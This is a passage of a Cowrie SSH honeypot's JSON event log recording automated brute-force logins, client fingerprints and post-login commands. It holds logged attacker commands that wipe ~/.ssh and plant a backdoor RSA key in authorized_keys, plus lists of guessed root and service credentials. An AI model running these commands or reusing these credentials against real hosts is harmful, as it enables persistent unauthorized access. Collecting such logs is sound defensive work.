t-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:15:35.738343Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE!@#123","message":"login attempt [root/QWE!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:15:37.077797Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:15:37.762074Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:15:37.762764Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:15:37.763911Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:38.099222Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.session.closed","duration":"29.4","message":"Connection lost after 29.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:38.451742Z","src_ip":"212.227.235.229","session":"6bcbbc321d96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:15:39.227389Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:15:39.228057Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"1234567","message":"login attempt [odoo/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:15:39.230866Z","src_ip":"212.227.235.229","session":"776a3f549f70"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:15:39.564370Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:39.565343Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40886,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b56a119e27","protocol":"ssh","message":"New connection: 212.227.235.229:40886 (1.2.3.4:22) [session: c1b56a119e27]","sensor":"my-vps","timestamp":"2025-08-31T04:15:40.001585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:15:40.022315Z","src_ip":"212.227.235.229","session":"c1b56a119e27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:15:40.337673Z","src_ip":"212.227.235.229","session":"c1b56a119e27"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:41.030232Z","src_ip":"212.227.235.229","session":"776a3f549f70"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:15:41.605026Z","src_ip":"212.227.235.229","session":"c1b56a119e27"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:42.925748Z","src_ip":"212.227.235.229","session":"c1b56a119e27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40890,"dst_ip":"1.2.3.4","dst_port":22,"session":"08aded0011e7","protocol":"ssh","message":"New connection: 212.227.235.229:40890 (1.2.3.4:22) [session: 08aded0011e7]","sensor":"my-vps","timestamp":"2025-08-31T04:15:43.243683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:15:43.244736Z","src_ip":"212.227.235.229","session":"08aded0011e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:15:43.558100Z","src_ip":"212.227.235.229","session":"08aded0011e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44848,"dst_ip":"1.2.3.4","dst_port":22,"session":"db925bc76069","protocol":"ssh","message":"New connection: 212.227.125.160:44848 (1.2.3.4:22) [session: db925bc76069]","sensor":"my-vps","timestamp":"2025-08-31T04:15:43.982481Z"}
{"eventid":"cowrie.session.closed","duration":46.24565529823303,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:44.662187Z","src_ip":"212.227.125.160","session":"b0cfaea87757"}
{"eventid":"cowrie.session.closed","duration":46.218093395233154,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:44.688342Z","src_ip":"212.227.235.229","session":"34e363b6117b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:15:45.229950Z","src_ip":"212.227.235.229","session":"08aded0011e7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:45.548055Z","src_ip":"212.227.235.229","session":"08aded0011e7"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:45.551038Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.session.closed","duration":46.640586853027344,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:46.686309Z","src_ip":"212.227.125.160","session":"93a1952f54d6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:15:51.054635Z","src_ip":"212.227.125.160","session":"db925bc76069"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:15:51.055389Z","src_ip":"212.227.125.160","session":"db925bc76069"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37010,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bc870e73a16","protocol":"ssh","message":"New connection: 212.227.125.160:37010 (1.2.3.4:22) [session: 2bc870e73a16]","sensor":"my-vps","timestamp":"2025-08-31T04:15:53.474266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:15:53.995066Z","src_ip":"212.227.125.160","session":"2bc870e73a16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:15:53.996675Z","src_ip":"212.227.125.160","session":"2bc870e73a16"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"1234567","message":"login attempt [odoo/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:15:56.404288Z","src_ip":"212.227.125.160","session":"2bc870e73a16"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:57.895781Z","src_ip":"212.227.125.160","session":"2bc870e73a16"}
{"eventid":"cowrie.session.closed","duration":46.2548553943634,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:58.854542Z","src_ip":"212.227.235.229","session":"73edadc2473b"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-31T04:16:03.113739Z","src_ip":"212.227.125.160","session":"db925bc76069"}
{"eventid":"cowrie.session.closed","duration":"23.2","message":"Connection lost after 23.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:07.232972Z","src_ip":"212.227.125.160","session":"db925bc76069"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64522,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0127091186d","protocol":"ssh","message":"New connection: 217.72.205.35:64522 (1.2.3.4:22) [session: b0127091186d]","sensor":"my-vps","timestamp":"2025-08-31T04:16:07.341418Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:07.342510Z","src_ip":"217.72.205.35","session":"b0127091186d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57464,"dst_ip":"1.2.3.4","dst_port":22,"session":"306a9da3d262","protocol":"ssh","message":"New connection: 212.227.235.229:57464 (1.2.3.4:22) [session: 306a9da3d262]","sensor":"my-vps","timestamp":"2025-08-31T04:16:08.042769Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56872,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4d3348cd4f1","protocol":"telnet","message":"New connection: 212.227.235.229:56872 (1.2.3.4:23) [session: b4d3348cd4f1]","sensor":"my-vps","timestamp":"2025-08-31T04:16:08.431932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:10.134411Z","src_ip":"212.227.235.229","session":"306a9da3d262"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:16:10.135672Z","src_ip":"212.227.235.229","session":"306a9da3d262"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-31T04:16:19.759625Z","src_ip":"212.227.235.229","session":"306a9da3d262"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:23.066029Z","src_ip":"212.227.235.229","session":"306a9da3d262"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43096,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e76c600dd2","protocol":"ssh","message":"New connection: 212.227.125.160:43096 (1.2.3.4:22) [session: 35e76c600dd2]","sensor":"my-vps","timestamp":"2025-08-31T04:16:25.881133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:30.612572Z","src_ip":"212.227.125.160","session":"35e76c600dd2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:16:30.613337Z","src_ip":"212.227.125.160","session":"35e76c600dd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54346,"dst_ip":"1.2.3.4","dst_port":22,"session":"629eff8a69cf","protocol":"ssh","message":"New connection: 212.227.235.229:54346 (1.2.3.4:22) [session: 629eff8a69cf]","sensor":"my-vps","timestamp":"2025-08-31T04:16:32.110811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:32.828908Z","src_ip":"212.227.235.229","session":"629eff8a69cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:16:32.829673Z","src_ip":"212.227.235.229","session":"629eff8a69cf"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"12345678","message":"login attempt [odoo/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:16:38.946548Z","src_ip":"212.227.235.229","session":"629eff8a69cf"}
{"eventid":"cowrie.session.closed","duration":30.833612203598022,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:39.265457Z","src_ip":"212.227.235.229","session":"b4d3348cd4f1"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:40.867712Z","src_ip":"212.227.235.229","session":"629eff8a69cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49664,"dst_ip":"1.2.3.4","dst_port":22,"session":"491161b09f51","protocol":"ssh","message":"New connection: 212.227.235.229:49664 (1.2.3.4:22) [session: 491161b09f51]","sensor":"my-vps","timestamp":"2025-08-31T04:16:49.066296Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42080,"dst_ip":"1.2.3.4","dst_port":22,"session":"100f6083a0c3","protocol":"ssh","message":"New connection: 212.227.125.160:42080 (1.2.3.4:22) [session: 100f6083a0c3]","sensor":"my-vps","timestamp":"2025-08-31T04:16:49.840828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:50.846303Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
